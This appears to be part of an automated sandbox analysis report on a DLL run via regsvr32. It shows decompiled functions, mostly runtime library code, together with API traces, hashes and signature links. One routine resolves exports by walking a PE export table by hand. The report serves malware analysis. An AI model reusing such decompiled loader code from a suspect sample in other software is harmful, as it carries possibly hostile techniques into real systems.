0x10010c26
0x10010c28
0x10010c2a
0x10010c2c
0x10010c2c
0x10010c31
0x10010c35
0x10010c6f
0x10010c71
0x00000000
0x10010c37
0x10010c37
0x10010c3c
0x10010c44
0x10010c47
0x10010c53
0x10010c59
0x10010c5b
0x10010c5e
0x00000000
0x00000000
0x10010c63
0x10010c69
0x10010c69
0x00000000
0x10010c49

APIs

Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
FreeLibrary.KERNEL32(?), ref: 10010C63

Strings

HtmlHelpA, xrefs: 10010C4D
hhctrl.ocx, xrefs: 10010C37

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 100224E9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100224E9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1002bb98;
					_v28 =  *0x1002bb90;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x100224ee
0x100224f6
0x1002250d
0x100224b9
0x100224c2
0x100224ce
0x100224d1
0x100224d4
0x100224d6
0x100224d9
0x100224de
0x100224e8
0x100224e0
0x100224e4
0x100224e4
0x100224f8
0x100224fe
0x10022506
0x00000000
0x10022508
0x10022508
0x1002250c
0x1002250c
0x10022506

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE

Strings

IsProcessorFeaturePresent, xrefs: 100224F8
KERNEL32, xrefs: 100224E9

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681

Uniqueness

Uniqueness Score: -1.00%

Function 10002D50, Relevance: 6.4, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				signed short* _v36;
				intOrPtr _v40;
				void* _t79;
				void* _t119;

				_v40 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v12 = 0;
				_v16 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v16 + 4)) != 0) {
					_v8 = _v20 +  *_v16;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
							_v24 = 0;
							_v28 = 0;
							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t79 = E10001F70(_a8, _v20 +  *_v32);
								_t119 = _t119 + 8;
								if(_t79 != 0) {
									_v28 = _v28 + 1;
									_v32 = _v32 + 4;
									_v36 =  &(_v36[1]);
									continue;
								}
								_v12 =  *_v36 & 0x0000ffff;
								_v24 = 1;
								break;
							}
							if(_v24 != 0) {
								L17:
								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

0x10002d56
0x10002d5f
0x10002d62
0x10002d71
0x10002d7b
0x10002d94
0x10002d9e
0x10002dab
0x00000000
0x10002db8
0x10002dc3
0x10002e0b
0x10002e17
0x10002e1a
0x10002e21
0x10002e45
0x10002e5d
0x10002e62
0x10002e67
0x10002e30
0x10002e39
0x10002e42
0x00000000
0x10002e42
0x10002e6f
0x10002e72
0x00000000
0x10002e72
0x10002e81
0x10002e8f
0x10002e98
0x00000000
0x10002eb5
0x10002e9c
0x00000000
0x10002ea2
0x10002e85
0x00000000
0x10002e8b
0x10002dd7
0x10002dfa
0x00000000
0x10002dfa
0x10002ddb
0x00000000
0x10002de1
0x10002d9e
0x10002d7f
0x00000000

APIs

SetLastError.KERNEL32(0000007F), ref: 10002D7F
SetLastError.KERNEL32(0000007F), ref: 10002DAB

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10023E83, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E10016E2B( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10017D62(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x10023e8b
0x10023e92
0x10023ea7
0x00000000
0x10023e99
0x10023e9b
0x10023eb3
0x10023eb8
0x10023ebb
0x10023ebe
0x10023ee7
0x10023eec
0x10023ef0
0x10023f71
0x10023f83
0x10023f8c
0x10023f8e
0x10023ece
0x10023ece
0x10023ed1
0x10023ed3
0x10023ed6
0x10023ed6
0x10023ed6
0x10023ed6
0x00000000
0x10023edc
0x10023f50
0x10023f50
0x10023f55
0x10023f5b
0x10023f5e
0x10023f60
0x10023f63
0x10023f63
0x10023f63
0x10023f63
0x00000000
0x10023f67
0x10023ef2
0x10023ef5
0x10023ef5
0x10023efb
0x10023efe
0x10023f25
0x10023f28
0x10023f28
0x10023f2e
0x00000000
0x00000000
0x10023f30
0x10023f33
0x00000000
0x00000000
0x10023f35
0x10023f35
0x10023f38
0x10023f38
0x10023f3e
0x10023eac
0x10023eac
0x10023f47
0x00000000
0x10023f47
0x10023f00
0x10023f03
0x00000000
0x00000000
0x10023f07
0x10023f15
0x10023f18
0x10023f1e
0x10023f20
0x10023f23
0x00000000
0x00000000
0x00000000
0x10023f23
0x10023ec0
0x10023ec3
0x10023ec5
0x10023ecb
0x10023ecb
0x00000000
0x10023e9d
0x10023e9d
0x10023ea2
0x10023ea4
0x10023ea4
0x00000000
0x10023ea2
0x10023e9b

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
__isleadbyte_l.LIBCMT ref: 10023EE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100145B9, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
					_t70 = E100139DB(0x10058f44);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10016380(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E1000B510();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x100145b9
0x100145b9
0x100145c3
0x100145c5
0x100145cc
0x100146a4
0x100146af
0x100146af
0x100145d2
0x100145d5
0x100145d8
0x00000000
0x00000000
0x100145e1
0x10014625
0x10014625
0x1001462b
0x10014638
0x1001463c
0x100146a3
0x00000000
0x10014642
0x10014642
0x10014645
0x10014647
0x10014658
0x1001465f
0x10014661
0x10014664
0x10014668
0x1001466a
0x1001466c
0x1001466d
0x10014672
0x10014675
0x10014678
0x1001467e
0x10014685
0x1001468d
0x10014690
0x100146a0
0x100146a0
0x10014690
0x00000000
0x1001465f
0x10014649
0x10014656
0x00000000
0x00000000
0x00000000
0x10014656
0x1001463c
0x100145e7
0x100145e9
0x100145f0
0x100145f2
0x100145f5
0x100145f7
0x100145fb
0x100145fb
0x100145f7
0x100145f0
0x10014600
0x10014608
0x10014610
0x10014618
0x10014620
0x00000000

APIs

__msize.LIBCMT ref: 1001464A
__msize.LIBCMT ref: 1001466D
_malloc.LIBCMT ref: 10014685
_malloc.LIBCMT ref: 1001469A

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009D34, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E10017BC1(E10027DA5, __ebx, __edi, __esi);
				_t35 = E10009B91(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10009CDE(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10017C83( &_a4, 0x1002e16c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x10009d34
0x10009d34
0x10009d34
0x10009d34
0x10009d34
0x10009d3b
0x10009d48
0x10009d4a
0x10009d4d
0x10009d51
0x10009d54
0x10009d56
0x10009d56
0x10009d5b
0x10009d5e
0x10009d62
0x10009d65
0x10009d71
0x10009d76
0x10009d78
0x10009d7a
0x10009d7d
0x10009d82
0x10009d84
0x10009d84
0x10009da2
0x10009db8
0x10009dc3
0x10009dcb
0x10009dcb
0x10009da4
0x10009da7
0x10009da9
0x10009da9
0x10009dce

APIs

__EH_prolog3.LIBCMT ref: 10009D3B

Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB

__CxxThrowException@8.LIBCMT ref: 10009D71
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A

Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D

LocalFree.KERNEL32(?), ref: 10009DC3

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C887, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000C887(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x1000c88a
0x1000c88b
0x1000c88e
0x1000c890
0x1000c897
0x1000c89a
0x1000c89d
0x1000c8a4
0x1000c8bb
0x1000c8bb
0x1000c8c2
0x1000c8cd
0x1000c8cd
0x1000c8d1
0x1000c8d4
0x1000c8dc
0x1000c8de
0x1000c8ed
0x1000c8f1
0x1000c8e0
0x1000c8e0
0x1000c8e3
0x1000c8e7
0x1000c8e7
0x1000c8fa
0x1000c906
0x1000c906
0x1000c8fa
0x1000c90c
0x1000c911
0x1000c911
0x1000c91d

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
LockResource.KERNEL32(00000000), ref: 1000C8C7
FreeResource.KERNEL32(00000000), ref: 1000C911

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADB5, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E10017BC1(E10027E86, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x10029f54;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A0DB(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
